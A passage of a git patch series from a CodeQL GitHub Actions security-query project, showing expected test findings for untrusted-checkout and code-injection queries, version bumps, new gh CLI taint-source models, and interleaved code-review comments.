$@ | .github/workflows/test7.yml:4:3:4:15 | issue_comment | .github/workflows/test7.yml | -| .github/workflows/test7.yml:49:9:58:20 | Run Step: benchmark-pr | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:49:9:58:20 | Run Step: benchmark-pr | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/test7.yml:4:3:4:15 | issue_comment | .github/workflows/test7.yml | -| .github/workflows/test10.yml:25:9:30:2 | Run Step | .github/workflows/test10.yml:20:9:25:6 | Uses Step | .github/workflows/test10.yml:25:9:30:2 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/test10.yml:8:3:8:21 | pull_request_target | .github/workflows/test10.yml | -| .github/workflows/test11.yml:90:7:93:54 | Uses Step | .github/workflows/test11.yml:84:7:90:4 | Uses Step | .github/workflows/test11.yml:90:7:93:54 | Uses Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/test11.yml:5:3:5:15 | issue_comment | .github/workflows/test11.yml | -| .github/workflows/test17.yml:19:15:23:58 | Uses Step | .github/workflows/test17.yml:12:15:19:12 | Uses Step | .github/workflows/test17.yml:19:15:23:58 | Uses Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/test17.yml:3:5:3:16 | workflow_run | .github/workflows/test17.yml | -| .github/workflows/untrusted_checkout3.yml:13:9:13:23 | Run Step | .github/actions/dangerous-git-checkout/action.yml:6:7:11:4 | Uses Step | .github/workflows/untrusted_checkout3.yml:13:9:13:23 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/untrusted_checkout3.yml:4:3:4:14 | workflow_run | .github/workflows/untrusted_checkout3.yml | -| .github/workflows/untrusted_checkout4.yml:61:7:67:4 | Run Step | .github/workflows/untrusted_checkout4.yml:55:7:61:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:61:7:67:4 | Run Step | Execution of untrusted code on a privileged workflow. 
$@ | .github/workflows/untrusted_checkout4.yml:4:3:4:15 | issue_comment | .github/workflows/untrusted_checkout4.yml | -| .github/workflows/untrusted_checkout4.yml:67:7:73:4 | Run Step | .github/workflows/untrusted_checkout4.yml:55:7:61:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:67:7:73:4 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/untrusted_checkout4.yml:4:3:4:15 | issue_comment | .github/workflows/untrusted_checkout4.yml | -| .github/workflows/untrusted_checkout4.yml:73:7:79:4 | Run Step | .github/workflows/untrusted_checkout4.yml:55:7:61:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:73:7:79:4 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/untrusted_checkout4.yml:4:3:4:15 | issue_comment | .github/workflows/untrusted_checkout4.yml | -| .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | .github/workflows/untrusted_checkout.yml:10:9:13:6 | Uses Step | .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/untrusted_checkout.yml:2:3:2:21 | pull_request_target | .github/workflows/untrusted_checkout.yml | -| .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | .github/workflows/untrusted_checkout.yml:13:9:16:6 | Uses Step | .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | Execution of untrusted code on a privileged workflow. 
$@ | .github/workflows/untrusted_checkout.yml:2:3:2:21 | pull_request_target | .github/workflows/untrusted_checkout.yml | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable.yml:26:9:29:7 | Run Step | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable.yml:23:9:26:6 | Uses Step | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable.yml:26:9:29:7 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/reusable_caller1.yaml:4:3:4:21 | pull_request_target | .github/workflows/reusable_caller1.yaml | +| .github/workflows/artifactpoisoning91.yml:28:9:29:6 | Uses Step | .github/workflows/artifactpoisoning91.yml:25:9:28:6 | Uses Step | .github/workflows/artifactpoisoning91.yml:28:9:29:6 | Uses Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/artifactpoisoning91.yml:3:3:3:14 | workflow_run | .github/workflows/artifactpoisoning91.yml | +| .github/workflows/artifactpoisoning91.yml:29:9:29:27 | Run Step | .github/workflows/artifactpoisoning91.yml:25:9:28:6 | Uses Step | .github/workflows/artifactpoisoning91.yml:29:9:29:27 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/artifactpoisoning91.yml:3:3:3:14 | workflow_run | .github/workflows/artifactpoisoning91.yml | +| .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | .github/workflows/artifactpoisoning92.yml:25:9:28:6 | Uses Step | .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/artifactpoisoning92.yml:3:3:3:14 | workflow_run | .github/workflows/artifactpoisoning92.yml | +| .github/workflows/artifactpoisoning92.yml:29:9:29:27 | Run Step | .github/workflows/artifactpoisoning92.yml:25:9:28:6 | Uses Step | .github/workflows/artifactpoisoning92.yml:29:9:29:27 | Run Step | Execution of untrusted code on a privileged workflow ($@) | 
.github/workflows/artifactpoisoning92.yml:3:3:3:14 | workflow_run | .github/workflows/artifactpoisoning92.yml | +| .github/workflows/auto_ci.yml:32:9:37:6 | Run Step | .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | .github/workflows/auto_ci.yml:32:9:37:6 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/auto_ci.yml:6:3:6:21 | pull_request_target | .github/workflows/auto_ci.yml | +| .github/workflows/auto_ci.yml:48:9:52:2 | Run Step | .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | .github/workflows/auto_ci.yml:48:9:52:2 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/auto_ci.yml:6:3:6:21 | pull_request_target | .github/workflows/auto_ci.yml | +| .github/workflows/auto_ci.yml:79:9:84:6 | Run Step | .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:79:9:84:6 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/auto_ci.yml:6:3:6:21 | pull_request_target | .github/workflows/auto_ci.yml | +| .github/workflows/auto_ci.yml:84:9:93:6 | Run Step | .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:84:9:93:6 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/auto_ci.yml:6:3:6:21 | pull_request_target | .github/workflows/auto_ci.yml | +| .github/workflows/dependabot3.yml:25:9:48:6 | Run Step: set-milestone | .github/workflows/dependabot3.yml:15:9:20:6 | Uses Step | .github/workflows/dependabot3.yml:25:9:48:6 | Run Step: set-milestone | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/dependabot3.yml:3:5:3:23 | pull_request_target | .github/workflows/dependabot3.yml | +| .github/workflows/gitcheckout.yml:21:11:23:22 | Run Step | .github/workflows/gitcheckout.yml:10:11:18:8 | Run Step | .github/workflows/gitcheckout.yml:21:11:23:22 | Run Step | Execution of untrusted code on a privileged workflow ($@) | 
.github/workflows/gitcheckout.yml:2:3:2:21 | pull_request_target | .github/workflows/gitcheckout.yml | +| .github/workflows/level0.yml:107:9:112:2 | Run Step | .github/workflows/level0.yml:99:9:103:6 | Uses Step | .github/workflows/level0.yml:107:9:112:2 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/level0.yml:3:3:3:8 | issues | .github/workflows/level0.yml | +| .github/workflows/level0.yml:107:9:112:2 | Run Step | .github/workflows/level0.yml:99:9:103:6 | Uses Step | .github/workflows/level0.yml:107:9:112:2 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/level0.yml:5:3:5:15 | issue_comment | .github/workflows/level0.yml | +| .github/workflows/level0.yml:107:9:112:2 | Run Step | .github/workflows/level0.yml:99:9:103:6 | Uses Step | .github/workflows/level0.yml:107:9:112:2 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/level0.yml:7:3:7:21 | pull_request_target | .github/workflows/level0.yml | +| .github/workflows/level0.yml:133:9:135:23 | Run Step | .github/workflows/level0.yml:125:9:129:6 | Uses Step | .github/workflows/level0.yml:133:9:135:23 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/level0.yml:3:3:3:8 | issues | .github/workflows/level0.yml | +| .github/workflows/level0.yml:133:9:135:23 | Run Step | .github/workflows/level0.yml:125:9:129:6 | Uses Step | .github/workflows/level0.yml:133:9:135:23 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/level0.yml:5:3:5:15 | issue_comment | .github/workflows/level0.yml | +| .github/workflows/level0.yml:133:9:135:23 | Run Step | .github/workflows/level0.yml:125:9:129:6 | Uses Step | .github/workflows/level0.yml:133:9:135:23 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/level0.yml:7:3:7:21 | pull_request_target | .github/workflows/level0.yml | +| 
.github/workflows/poc2.yml:42:9:47:6 | Uses Step | .github/workflows/poc2.yml:37:9:42:6 | Uses Step | .github/workflows/poc2.yml:42:9:47:6 | Uses Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/poc2.yml:4:3:4:15 | issue_comment | .github/workflows/poc2.yml | +| .github/workflows/poc2.yml:52:9:58:24 | Run Step | .github/workflows/poc2.yml:37:9:42:6 | Uses Step | .github/workflows/poc2.yml:52:9:58:24 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/poc2.yml:4:3:4:15 | issue_comment | .github/workflows/poc2.yml | +| .github/workflows/pr-workflow.yml:222:9:227:6 | Uses Step | .github/workflows/pr-workflow.yml:216:9:222:6 | Uses Step | .github/workflows/pr-workflow.yml:222:9:227:6 | Uses Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | .github/workflows/pr-workflow-fork.yaml | +| .github/workflows/pr-workflow.yml:256:9:261:6 | Uses Step | .github/workflows/pr-workflow.yml:250:9:256:6 | Uses Step | .github/workflows/pr-workflow.yml:256:9:261:6 | Uses Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | .github/workflows/pr-workflow-fork.yaml | +| .github/workflows/pr-workflow.yml:290:9:295:6 | Uses Step | .github/workflows/pr-workflow.yml:284:9:290:6 | Uses Step | .github/workflows/pr-workflow.yml:290:9:295:6 | Uses Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | .github/workflows/pr-workflow-fork.yaml | +| .github/workflows/pr-workflow.yml:391:9:395:6 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:391:9:395:6 | Uses Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | 
.github/workflows/pr-workflow-fork.yaml | +| .github/workflows/pr-workflow.yml:395:9:404:6 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:395:9:404:6 | Uses Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | .github/workflows/pr-workflow-fork.yaml | +| .github/workflows/pr-workflow.yml:404:9:414:6 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:404:9:414:6 | Uses Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | .github/workflows/pr-workflow-fork.yaml | +| .github/workflows/pr-workflow.yml:414:9:423:6 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:414:9:423:6 | Uses Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | .github/workflows/pr-workflow-fork.yaml | +| .github/workflows/pr-workflow.yml:423:9:432:2 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:423:9:432:2 | Uses Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | .github/workflows/pr-workflow-fork.yaml | +| .github/workflows/reusable_local.yml:26:9:29:7 | Run Step | .github/workflows/reusable_local.yml:23:9:26:6 | Uses Step | .github/workflows/reusable_local.yml:26:9:29:7 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/reusable_caller3.yaml:4:3:4:21 | pull_request_target | .github/workflows/reusable_caller3.yaml | +| .github/workflows/test7.yml:33:9:36:6 | Run Step | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:33:9:36:6 | Run Step | Execution 
of untrusted code on a privileged workflow ($@) | .github/workflows/test7.yml:4:3:4:15 | issue_comment | .github/workflows/test7.yml | +| .github/workflows/test7.yml:36:9:39:6 | Run Step | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:36:9:39:6 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/test7.yml:4:3:4:15 | issue_comment | .github/workflows/test7.yml | +| .github/workflows/test7.yml:49:9:58:20 | Run Step: benchmark-pr | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:49:9:58:20 | Run Step: benchmark-pr | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/test7.yml:4:3:4:15 | issue_comment | .github/workflows/test7.yml | +| .github/workflows/test10.yml:25:9:30:2 | Run Step | .github/workflows/test10.yml:20:9:25:6 | Uses Step | .github/workflows/test10.yml:25:9:30:2 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/test10.yml:7:3:7:19 | workflow_dispatch | .github/workflows/test10.yml | +| .github/workflows/test10.yml:25:9:30:2 | Run Step | .github/workflows/test10.yml:20:9:25:6 | Uses Step | .github/workflows/test10.yml:25:9:30:2 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/test10.yml:8:3:8:21 | pull_request_target | .github/workflows/test10.yml | +| .github/workflows/test11.yml:90:7:93:54 | Uses Step | .github/workflows/test11.yml:84:7:90:4 | Uses Step | .github/workflows/test11.yml:90:7:93:54 | Uses Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/test11.yml:5:3:5:15 | issue_comment | .github/workflows/test11.yml | +| .github/workflows/test17.yml:19:15:23:58 | Uses Step | .github/workflows/test17.yml:12:15:19:12 | Uses Step | .github/workflows/test17.yml:19:15:23:58 | Uses Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/test17.yml:3:5:3:16 | workflow_run | 
.github/workflows/test17.yml | +| .github/workflows/untrusted_checkout3.yml:13:9:13:23 | Run Step | .github/actions/dangerous-git-checkout/action.yml:6:7:11:4 | Uses Step | .github/workflows/untrusted_checkout3.yml:13:9:13:23 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/untrusted_checkout3.yml:4:3:4:14 | workflow_run | .github/workflows/untrusted_checkout3.yml | +| .github/workflows/untrusted_checkout4.yml:35:7:41:4 | Run Step | .github/workflows/untrusted_checkout4.yml:29:7:35:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:35:7:41:4 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/untrusted_checkout4.yml:2:3:2:15 | issue_comment | .github/workflows/untrusted_checkout4.yml | +| .github/workflows/untrusted_checkout4.yml:41:7:47:4 | Run Step | .github/workflows/untrusted_checkout4.yml:29:7:35:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:41:7:47:4 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/untrusted_checkout4.yml:2:3:2:15 | issue_comment | .github/workflows/untrusted_checkout4.yml | +| .github/workflows/untrusted_checkout4.yml:47:7:51:46 | Run Step | .github/workflows/untrusted_checkout4.yml:29:7:35:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:47:7:51:46 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/untrusted_checkout4.yml:2:3:2:15 | issue_comment | .github/workflows/untrusted_checkout4.yml | +| .github/workflows/untrusted_checkout.yml:15:9:18:2 | Run Step | .github/workflows/untrusted_checkout.yml:8:9:11:6 | Uses Step | .github/workflows/untrusted_checkout.yml:15:9:18:2 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/untrusted_checkout.yml:2:3:2:21 | pull_request_target | .github/workflows/untrusted_checkout.yml | +| .github/workflows/untrusted_checkout.yml:30:9:32:23 | Run Step | 
.github/workflows/untrusted_checkout.yml:23:9:26:6 | Uses Step | .github/workflows/untrusted_checkout.yml:30:9:32:23 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/untrusted_checkout.yml:2:3:2:21 | pull_request_target | .github/workflows/untrusted_checkout.yml | diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.expected index 1d6122b3747..13e16280c33 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.expected @@ -1,3 +1,7 @@ +| .github/workflows/issue_comment_3rd_party_action.yml:16:9:22:2 | Uses Step | Potential execution of untrusted code on a privileged workflow. | +| .github/workflows/issue_comment_3rd_party_action.yml:30:9:36:2 | Uses Step | Potential execution of untrusted code on a privileged workflow. | +| .github/workflows/issue_comment_3rd_party_action.yml:45:9:49:6 | Uses Step | Potential execution of untrusted code on a privileged workflow. | +| .github/workflows/issue_comment_3rd_party_action.yml:49:9:52:25 | Uses Step | Potential execution of untrusted code on a privileged workflow. | | .github/workflows/issue_comment_direct.yml:12:9:16:2 | Uses Step | Potential execution of untrusted code on a privileged workflow. | | .github/workflows/issue_comment_direct.yml:20:9:24:2 | Uses Step | Potential execution of untrusted code on a privileged workflow. | | .github/workflows/issue_comment_direct.yml:28:9:32:2 | Uses Step | Potential execution of untrusted code on a privileged workflow. | diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected index 29237c9a544..c81666f72dc 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected 
@@ -4,10 +4,6 @@ | .github/workflows/dependabot1.yml:15:9:19:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/dependabot1.yml:39:9:43:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/dependabot2.yml:33:9:38:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | -| .github/workflows/issue_comment_3rd_party_action.yml:16:9:22:2 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | -| .github/workflows/issue_comment_3rd_party_action.yml:30:9:36:2 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | -| .github/workflows/issue_comment_3rd_party_action.yml:45:9:49:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | -| .github/workflows/issue_comment_3rd_party_action.yml:49:9:52:25 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/mend.yml:22:9:29:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/poc3.yml:18:7:25:4 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/poc.yml:30:9:36:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | From 54338f4f35274436b2a76f44c4479ec435da070d Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 22 Oct 2024 11:19:48 +0200 Subject: [PATCH 0607/1267] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index c908efa68f7..867f1bfdb86 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml 
@@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.70 +version: 0.1.71 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index d2c2e26c361..df650d0e242 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.70 +version: 0.1.71 groups: [actions, queries] suites: codeql-suites extractor: javascript From 02c5f74f2059dff88cc6f02655151e0728c28000 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 22 Oct 2024 14:57:59 +0200 Subject: [PATCH 0608/1267] New gh CLI sources --- ql/lib/codeql/actions/config/Config.qll | 14 ++- .../actions/config/ConfigExtensions.qll | 7 +- .../codeql/actions/dataflow/FlowSources.qll | 30 ++++- .../security/OutputClobberingQuery.qll | 2 +- ql/lib/ext/config/untrusted_gh_command.yml | 56 +++++++++ ...commands.yml => untrusted_git_command.yml} | 2 +- .../CWE-094/.github/workflows/test19.yml | 112 ++++++++++++++++++ .../CWE-094/CodeInjectionCritical.expected | 108 +++++++++++++++++ .../CWE-094/CodeInjectionMedium.expected | 90 ++++++++++++++ 9 files changed, 412 insertions(+), 9 deletions(-) create mode 100644 ql/lib/ext/config/untrusted_gh_command.yml rename ql/lib/ext/config/{untrusted_git_commands.yml => untrusted_git_command.yml} (96%) create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/test19.yml diff --git a/ql/lib/codeql/actions/config/Config.qll b/ql/lib/codeql/actions/config/Config.qll index 82b7a53a9d7..4dbdcbf5528 100644 --- a/ql/lib/codeql/actions/config/Config.qll +++ b/ql/lib/codeql/actions/config/Config.qll 
@@ -125,6 +125,16 @@ predicate vulnerableActionsDataModel( * - cmd_regex: Regular expression for matching untrusted git commands * - flag: Flag for the command */ -predicate untrustedGitCommandsDataModel(string cmd_regex, string flag) { - Extensions::untrustedGitCommandsDataModel(cmd_regex, flag) +predicate untrustedGitCommandDataModel(string cmd_regex, string flag) { + Extensions::untrustedGitCommandDataModel(cmd_regex, flag) +} + +/** + * MaD models for untrusted gh commands + * Fields: + * - cmd_regex: Regular expression for matching untrusted gh commands + * - flag: Flag for the command + */ +predicate untrustedGhCommandDataModel(string cmd_regex, string flag) { + Extensions::untrustedGhCommandDataModel(cmd_regex, flag) } diff --git a/ql/lib/codeql/actions/config/ConfigExtensions.qll b/ql/lib/codeql/actions/config/ConfigExtensions.qll index a32e9c445f2..ed575de0eb4 100644 --- a/ql/lib/codeql/actions/config/ConfigExtensions.qll +++ b/ql/lib/codeql/actions/config/ConfigExtensions.qll @@ -61,4 +61,9 @@ extensible predicate vulnerableActionsDataModel( /** * Holds for git commands that may introduce untrusted data when called on an attacker controlled branch. */ -extensible predicate untrustedGitCommandsDataModel(string cmd_regex, string flag); +extensible predicate untrustedGitCommandDataModel(string cmd_regex, string flag); + +/** + * Holds for gh commands that may introduce untrusted data + */ +extensible predicate untrustedGhCommandDataModel(string cmd_regex, string flag); diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll index 91b110f87ee..56c901434ce 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSources.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll 
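Review bot: The QLDoc added above `untrustedGhCommandDataModel` says only "Regular expression for matching untrusted gh commands" and "Flag for the command", which does not tell the author of a data extension how a row is evaluated. In FlowSources.qll the pattern is applied as `cmd.regexpMatch(cmd_regex + ".*")`, so it must match from the first character of the statement. The rows in untrusted_gh_command.yml use two-part flags such as `title,oneline` and `text,multiline`. I would document both, e.g. ` * - cmd_regex: regex matched from the start of a script statement (".*" is appended)` and ` * - flag: "<kind>,<oneline|multiline>" describing the tainted value`. The same wording belongs on `untrustedGitCommandDataModel`, whose matching this commit changes from `".*" + cmd_regex + ".*"` to start-anchored.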
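Review bot: Renaming the extensible predicate `untrustedGitCommandsDataModel` to `untrustedGitCommandDataModel` changes the name that data extensions address in their `extensible:` key, and this commit updates only the in-tree untrusted_git_command.yml. A model pack maintained outside the repository that still targets the old name would presumably stop contributing rows or fail to load, which narrows what the git-command source detects without any visible signal in query results. If external extensions are supported, consider keeping the old extensible predicate for one release and accepting both in Config.qll, or call the rename out in the change notes for the version that ships it.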
@@ -80,7 +80,7 @@ class GitCommandSource extends RemoteFlowSource, CommandSource { GitCommandSource() { exists(Step checkout, string cmd_regex | - // This shoould be: + // This should be: // source instanceof PRHeadCheckoutStep // but PRHeadCheckoutStep uses Taint Tracking anc causes a non-Monolitic Recursion error // so we list all the subclasses of PRHeadCheckoutStep here and use actions/checkout as a workaround @@ -105,8 +105,8 @@ class GitCommandSource extends RemoteFlowSource, CommandSource { checkout.getAFollowingStep() = run and run.getScript().getAStmt() = cmd and cmd.indexOf("git") = 0 and - untrustedGitCommandsDataModel(cmd_regex, flag) and - cmd.regexpMatch(".*" + cmd_regex + ".*") + untrustedGitCommandDataModel(cmd_regex, flag) and + cmd.regexpMatch(cmd_regex + ".*") ) } @@ -117,6 +117,28 @@ class GitCommandSource extends RemoteFlowSource, CommandSource { override Run getEnclosingRun() { result = run } } +class GhCLICommandSource extends RemoteFlowSource, CommandSource { + Run run; + string cmd; + string flag; + + GhCLICommandSource() { + exists(string cmd_regex | + this.asExpr() = run.getScript() and + run.getScript().getAStmt() = cmd and + cmd.indexOf("gh ") = 0 and + untrustedGhCommandDataModel(cmd_regex, flag) and + cmd.regexpMatch(cmd_regex + ".*") + ) + } + + override string getSourceType() { result = flag } + + override Run getEnclosingRun() { result = run } + + override string getCommand() { result = cmd } +} + class GitHubEventPathSource extends RemoteFlowSource, CommandSource { string cmd; string flag; @@ -206,7 +228,7 @@ class ArtifactSource extends RemoteFlowSource, FileSource { */ private class CheckoutSource extends RemoteFlowSource, FileSource { CheckoutSource() { - // This shoould be: + // This should be: // source instanceof PRHeadCheckoutStep // but PRHeadCheckoutStep uses Taint Tracking anc causes a non-Monolitic Recursion error // so we list all the subclasses of PRHeadCheckoutStep here and use actions/checkout as a workaround 
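Review bot: In `GhCLICommandSource` the guard `cmd.indexOf("gh ") = 0` accepts only a literal single space after `gh`, whereas every row in untrusted_gh_command.yml begins with `gh\\s+`, so a statement that separates `gh` from its subcommand with a tab satisfies the model but is rejected by the guard and never becomes a source. Because `cmd.regexpMatch(cmd_regex + ".*")` already has to match from the first character, the guard can be dropped or written as `cmd.regexpMatch("gh\\s.*")`. The class also has no QLDoc; a comment such as `/** A gh CLI call in a run script whose output (PR or issue title, body, comments, changed files, author) is attacker-controlled. */` would state the intent. Unlike `GitCommandSource` earlier in the file, the characteristic predicate shown here does not tie the command to a preceding checkout or a trigger, so any restriction to privileged workflows must happen elsewhere and cannot be confirmed from this hunk.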
diff --git a/ql/lib/codeql/actions/security/OutputClobberingQuery.qll b/ql/lib/codeql/actions/security/OutputClobberingQuery.qll index 58b7b18ca62..311c3abdb69 100644 --- a/ql/lib/codeql/actions/security/OutputClobberingQuery.qll +++ b/ql/lib/codeql/actions/security/OutputClobberingQuery.qll @@ -20,7 +20,7 @@ class OutputClobberingFromFileReadSink extends OutputClobberingSink { ( step instanceof UntrustedArtifactDownloadStep or - // This shoould be: + // This should be: // artifact instanceof PRHeadCheckoutStep // but PRHeadCheckoutStep uses Taint Tracking anc causes a non-Monolitic Recursion error // so we list all the subclasses of PRHeadCheckoutStep here and use actions/checkout as a workaround diff --git a/ql/lib/ext/config/untrusted_gh_command.yml b/ql/lib/ext/config/untrusted_gh_command.yml new file mode 100644 index 00000000000..653f9e31c98 --- /dev/null +++ b/ql/lib/ext/config/untrusted_gh_command.yml 
@@ -0,0 +1,56 @@
+extensions:
+ - addsTo:
+ pack: github/actions-all
+ extensible: untrustedGhCommandDataModel
+ data:
+ #
+ # PULL REQUESTS
+ #
+ # HEAD_REF=$(gh pr view "${{ github.event.issue.number }}" --json headRefName -q '.headRefName')
+ - ["gh\\s+pr\\b.*\\bview\\b.*\\.headRefName.*", "branch,oneline"]
+ # TITLE=$(gh pr view $PR_NUMBER --json title --jq .title)
+ - ["gh\\s+pr\\b.*\\bview\\b.*\\.title.*", "title,oneline"]
+ # BODY=$(gh pr view $PR_NUMBER --json body --jq .body)
+ - ["gh\\s+pr\\b.*\\bview\\b.*\\.body.*", "text,multiline"]
+ # COMMENTS="$(gh pr view --repo ${{ github.repository }} "$PR_NUMBER" --json "body,comments" -q '.body, .comments[].body')"
+ - ["gh\\s+pr\\b.*\\bview\\b.*\\.comments.*", "text,multiline"]
+ # CHANGED_FILES="$(gh pr view --repo ${{ github.repository }} ${{ needs.check-comment.outputs.pull_number }} --json files --jq '.files.[].path')"
+ - ["gh\\s+pr\\b.*\\bview\\b.*\\.files.*", "filename,multiline"]
+ # AUTHOR=$(gh pr view ${ORI_PR} -R ${REPO} --json author -q '.author.login')
+ - ["gh\\s+pr\\b.*\\bview\\b.*\\.author.*", "username,oneline"]
+ #
+ # ISSUES
+ #
+ # TITLE=$(gh issue view "$ISSUE_NUMBER" --json title --jq '.title')
